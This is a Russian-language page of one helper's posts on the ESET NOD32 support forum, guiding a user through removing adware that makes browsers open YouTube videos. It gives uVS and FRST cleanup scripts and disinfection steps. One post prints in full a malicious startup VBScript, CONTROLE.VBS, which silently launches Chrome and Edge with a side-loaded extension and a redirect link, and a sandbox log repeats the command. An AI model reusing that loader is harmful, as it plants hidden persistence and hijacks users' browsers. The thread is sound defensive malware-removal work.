RP55 RP55 (Все сообщения пользователя) - Форум технической поддержки ESET NOD32

Неуловимый вирус. Автоматически просматривает видео в ютубе.

Сообщений: 6241

Баллов: 4992

Регистрация: 25.05.2010

Размещено 18.08.2022 18:40:19

Можно ещё этим почистить: https://www.comss.ru/page.php?id=2421
Но... там нужно внимательно смотреть - что будет предложено к удалению.
Так - что будут нужны снимки вкладок с найденным. ( ЧТОБЫ ВСЁ БЫЛО ВИДНО :) )
+
Обновите все браузеры ( если есть доступные обновления ) ( даже те браузеры которые у вас стоят - но вы с ними не работаете )
И потом ( после всего :) ) - Желательно изменить пароли.

Изменено: RP55 RP55 - 18.08.2022 18:49:08

Перейти

Неуловимый вирус. Автоматически просматривает видео в ютубе.

Сообщений: 6241

Баллов: 4992

Регистрация: 25.05.2010

Размещено 18.08.2022 17:36:29

Далее выполните лог программой Malwarebytes ( Kasper - на время установки Malwarebytes - отключите )
http://forum.esetnod32.ru/forum9/topic10688/

Выберите вариант сканирования: Быстрое или Полное сканирование.
Отчет предоставить для анализа ( в своей теме на форуме ).
Отчёт нужно предоставить в .txt ( блокнот )

+
Сделайте комплексный лог Autoruns ( отчёт сюда )
https://safezone.cc/threads/kak-podgotovit-log-autoruns.30173/

Изменено: RP55 RP55 - 18.08.2022 17:39:26

Перейти

Неуловимый вирус. Автоматически просматривает видео в ютубе.

Сообщений: 6241

Баллов: 4992

Регистрация: 25.05.2010

Размещено 18.08.2022 16:32:58

1) Сохраните файл: fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

Запустите FRST и нажмите один раз на кнопку Fix и подождите.

Программа FRST создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

2) Скопируйте текст КОДа - в буфер обмена.
uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена.
ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ!
ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !

Код
;uVS v4.11.12 [http://dsrt.dyndns.org:8888] ;Target OS: NTv11.0 v400c OFFSGNSAVE deltmp restart ;---------command-block--------- delref {159FF5D5-55F1-4D2F-B706-767A55F77ABB}\[CLSID] delref {1DAC0C53-7D23-4AB3-856A-B04D98CD982A}\[CLSID] delref %SystemDrive%\PROGRAM FILES\BITDEFENDER\BITDEFENDER SECURITY\BDWTEFF.XPI delref %SystemDrive%\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY TOTAL SECURITY 21.3\FFEXT\LIGHT_PLUGIN_FIREFOX\ADDON.XPI delref %SystemDrive%\PROGRAM FILES\COMMON FILES\BITDEFENDER\SETUPINFORMATION\CL-26-A25B50FF-7E42-4637-AA3A-4C71F23F8B3A\SETUPLAUNCHER.EXE delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NVIVI.INF_AMD64_285E9249015A7F10\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F %PROGRAMDATA%\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NVIVI.INF_AMD64_285E9249015A7F10\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\XA43K758.DEFAULT\EXTENSIONS\[email protected] delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\XA43K758.DEFAULT\EXTENSIONS\[email protected] delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.165.21\PSMACHINE_64.DLL delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\IGDLH64.INF_AMD64_2681FC9DEDD95CD9\IGFXEXPS32.DLL delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.165.21\PSMACHINE.DLL delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NVIVI.INF_AMD64_285E9249015A7F10\NVDECMFTMJPEG.DLL delref D:\CHROME PORTABLE\GOOGLECHROMEPORTABLE64\APP\CHROME-BIN\CHROME.EXE delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\ACESTREAM\PLAYER\NPACE_PLUGIN.DLL delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\ACESTREAM\EXTENSIONS\AWE\FIREFOX\ACEWEBEXTENSION_UNLISTED.XPI delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE delref D:\CHROME PORTABLE\GOOGLECHROMEPORTABLE64\APP\CHROME-BIN\CHROME_PROXY.EXE delref CLIENTS2.GOOGLE.COM delref %SystemDrive%\USERS\E8921\\LOCAL SETTINGS\APPLICATION DATA\YANDEX\YANDEXBROWSER\USER DATA\DEFAULT\EXTENSIONS\[email protected] delall %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\XA43K758.DEFAULT\EXTENSIONS\[email protected] apply

Код

;uVS v4.11.12 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
deltmp
restart
;---------command-block---------
delref {159FF5D5-55F1-4D2F-B706-767A55F77ABB}\[CLSID]
delref {1DAC0C53-7D23-4AB3-856A-B04D98CD982A}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\BITDEFENDER\BITDEFENDER SECURITY\BDWTEFF.XPI
delref %SystemDrive%\PROGRAM FILES (X86)\KASPERSKY LAB\KASPERSKY TOTAL SECURITY 21.3\FFEXT\LIGHT_PLUGIN_FIREFOX\ADDON.XPI
delref %SystemDrive%\PROGRAM FILES\COMMON FILES\BITDEFENDER\SETUPINFORMATION\CL-26-A25B50FF-7E42-4637-AA3A-4C71F23F8B3A\SETUPLAUNCHER.EXE
delref %Sys32%\DRIVERSTORE\FILEREPOSITORY\NVIVI.INF_AMD64_285E9249015A7F10\DISPLAY.NVCONTAINER\NVDISPLAY.CONTAINER.EXE -S NVDISPLAY.CONTAINERLOCALSYSTEM -F %PROGRAMDATA%\NVIDIA\NVDISPLAY.CONTAINERLOCALSYSTEM.LOG -L 3 -D C:\WINDOWS\SYSTEM32\DRIVERSTORE\FILEREPOSITORY\NVIVI.INF_AMD64_285E9249015A7F10\DISPLAY.NVCONTAINER\PLUGINS\LOCALSYSTEM -R -P 30000 -CFG NVDISPLAY.CONTAINERLOCALSYSTEM\LOCALSYSTEM
delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\XA43K758.DEFAULT\EXTENSIONS\[email protected]
delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\XA43K758.DEFAULT\EXTENSIONS\[email protected]
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.165.21\PSMACHINE_64.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\IGDLH64.INF_AMD64_2681FC9DEDD95CD9\IGFXEXPS32.DLL
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGEUPDATE\1.3.165.21\PSMACHINE.DLL
delref %SystemRoot%\SYSWOW64\DRIVERSTORE\FILEREPOSITORY\NVIVI.INF_AMD64_285E9249015A7F10\NVDECMFTMJPEG.DLL
delref D:\CHROME PORTABLE\GOOGLECHROMEPORTABLE64\APP\CHROME-BIN\CHROME.EXE
delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\ACESTREAM\PLAYER\NPACE_PLUGIN.DLL
delref %SystemDrive%\USERS\E8921\APPDATA\ROAMING\ACESTREAM\EXTENSIONS\AWE\FIREFOX\ACEWEBEXTENSION_UNLISTED.XPI
delref %SystemDrive%\PROGRAM FILES (X86)\GOOGLE\CHROME\APPLICATION\CHROME.EXE
delref D:\CHROME PORTABLE\GOOGLECHROMEPORTABLE64\APP\CHROME-BIN\CHROME_PROXY.EXE
delref CLIENTS2.GOOGLE.COM
delref %SystemDrive%\USERS\E8921\\LOCAL SETTINGS\APPLICATION DATA\YANDEX\YANDEXBROWSER\USER DATA\DEFAULT\EXTENSIONS\[email protected]
delall %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\XA43K758.DEFAULT\EXTENSIONS\[email protected]
apply

Перейти

Неуловимый вирус. Автоматически просматривает видео в ютубе.

Сообщений: 6241

Баллов: 4992

Регистрация: 25.05.2010

Размещено 18.08.2022 13:46:54

Kot Obormot

У вас одних ярлыков в системе 900
Более 200 ( только непроверенных ) скриптов.
И более 130 установленных программ...
--------
Нужен новый образ автозапуска в uVS
и Лог в FRST
будем удалять всё... подозрительное.

Перейти

отмена лицензии, отмена лицензии

Сообщений: 6241

Баллов: 4992

Регистрация: 25.05.2010

Размещено 17.08.2022 23:15:50

Rom Namor

Вам нужно обратиться в службу технической поддержки ESET по адресу: [email protected]

* На форуме нет доступа к данным - лицензий.

Перейти

uVS как стать опытными пользователем этой программы., Обучение пользования программой uVS

Сообщений: 6241

Баллов: 4992

Регистрация: 25.05.2010

Размещено 17.08.2022 18:52:13

Сейчас часто используют легальные файлы для "атаки"
Как правило это чистые файлы - но устаревшие. Например стоит современная\актуальная\обновлённая версия программы. Но ей подсовывают старый файл этой же программы ( со множеством узявимостей ) - которые и эксплуатируются.

Или есть некий старый скрипт... который всю свою сознательную :) жизнь был чист. Он обращался к некому сайту... Но теперь у сайта другой владелец, или сайт был взломан.
-----
Как выявить ? Как правило работают с самыми популярными ( ежедневно используемыми на PC программами ) Браузеры и т.д.
Каталог\папка с этим старым дополнением будет рядом с этой программой. В том же каталоге или рядом. Большая разница по времени между созданием\изменением файла\файлов.
Например в каталоге с файлами 2022 года файл 2010.
Если есть сомнение можно файл на время переименовать. Например с updater.dll в updater.dll111
Чаще всего эти компоненты являются библиотеками\программными дополнениями или скриптами.
Так как файл чист - то и расширение файла - как правило стандартное.
-----
Если объектов в системе слишком много - переименовать\удалить всё, что не влияет на работу системы. Всё лишнее.
+
Возможно файл запускается через задачу, или автозапуск.

Изменено: RP55 RP55 - 18.08.2022 00:11:30

Перейти

Неуловимый вирус. Автоматически просматривает видео в ютубе.

Сообщений: 6241

Баллов: 4992

Регистрация: 25.05.2010

Размещено 17.08.2022 18:31:36

+
Если тема по вирусам\рекламе интересна.
https://forum.esetnod32.ru/forum8/topic15785/

Перейти

Неуловимый вирус. Автоматически просматривает видео в ютубе.

Сообщений: 6241

Баллов: 4992

Регистрация: 25.05.2010

Размещено 17.08.2022 18:26:39

Цитата
Kot Obormot написал: P.S. Надо было, наверное, сделать резервную копию этого файла перед удалением... Эхъ

На V.T в колонке: Behavior есть весть текст скрипта.

Код
1988 - c:/windows/system32/cscript.exe Controle.vbs 2264 - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog https://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000 2312 - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --type=crashpad-handler --user-data-dir=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Crashpad --metrics-dir=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=83.0.4103.97 --initial-client-data=0x18c,0x190,0x194,0x160,0x198,0x7feeaedbd28,0x7feeaedbd38,0x7feeaedbd48

Код

1988 - c:/windows/system32/cscript.exe Controle.vbs
2264 - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog https://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000
2312 - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --type=crashpad-handler --user-data-dir=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Crashpad --metrics-dir=C:\Users\<USER>\AppData\Local\Google\Chrome\User Data --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=83.0.4103.97 --initial-client-data=0x18c,0x190,0x194,0x160,0x198,0x7feeaedbd28,0x7feeaedbd38,0x7feeaedbd48

Перейти

Неуловимый вирус. Автоматически просматривает видео в ютубе.

Сообщений: 6241

Баллов: 4992

Регистрация: 25.05.2010

Размещено 17.08.2022 18:10:23

+
В общем с запуском системы запускался скрипт ( CONTROLE.VBS ) > браузер получал команду и выходил на сайт ХХХ с пере-направлением на другой сайт - и там уже этот сайт мог вам показывать всякое :)

Перейти

Неуловимый вирус. Автоматически просматривает видео в ютубе.

Сообщений: 6241

Баллов: 4992

Регистрация: 25.05.2010

Размещено 17.08.2022 17:45:17

Полное имя C:\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\CONTROLE.VBS
Имя файла CONTROLE.VBS
Тек. статус ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске

www.virustotal.com 2022-02-17 20:18 [2021-04-06] Файл был чист на момент проверки.

Сохраненная информация на момент создания образа
Статус в автозапуске
Размер 649 байт
Создан 01.04.2021 в 22:38:31
Изменен 25.03.2021 в 17:20:04
Цифр. подпись Отсутствует либо ее не удалось проверить

Доп. информация на момент обновления списка
SHA1 58367B32AAE4C92208268A1F4B50E37862FC0162
MD5 0278DC59F174789C3D2AA24DD835FD3A

#FILE# On Error Resume Next

Dim WShell
Set WShell = CreateObject("WScript.Shell")

WShell.Run "chrome.exe --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog ????://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000", 0
WShell.Run "msedge.exe --load-extension=C:\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog\ProgLog ????://short-link.space/download/GT/redirect.php?_____Signe=_____ok&source=trAll_25_03_2021 --new-window --window-position=800,50 --window-size=2500,1000", 0

Set WShell = Nothing

On Error Goto 0

Ссылки на объект
Ссылка C:\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP
---------------
Файл известен с 2021-04-06
И V.T. показывает, что он чист.
https://www.virustotal.com/gui/file/dd438f4ed90e30e4ed4897937390ef0a9507b88f03eac2a323a00fb456420162?nocache=1
-----------------
Для удаления CONTROLE.VBS
Скопируйте текст КОДа - в буфер обмена.
uVS: start.exe, текущий пользователь, меню, скрипты - выполнить скрипт из буфера обмена.
ПЕРЕД ВЫПОЛНЕНИЕМ СКРИПТА, ЗАКРЫТЬ БРАУЗЕРЫ!
ВНИМАНИЕ : По окончанию выполнения скрипта компьютер выполнит перезагрузку !

Код
;uVS v4.11.12 [http://dsrt.dyndns.org:8888] ;Target OS: NTv11.0 v400c OFFSGNSAVE ;---------command-block--------- delall %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\CONTROLE.VBS apply restart

Код


;uVS v4.11.12 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
;---------command-block---------
delall %SystemDrive%\USERS\E8921\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\CONTROLE.VBS
apply

restart

Изменено: RP55 RP55 - 17.08.2022 17:47:40

Перейти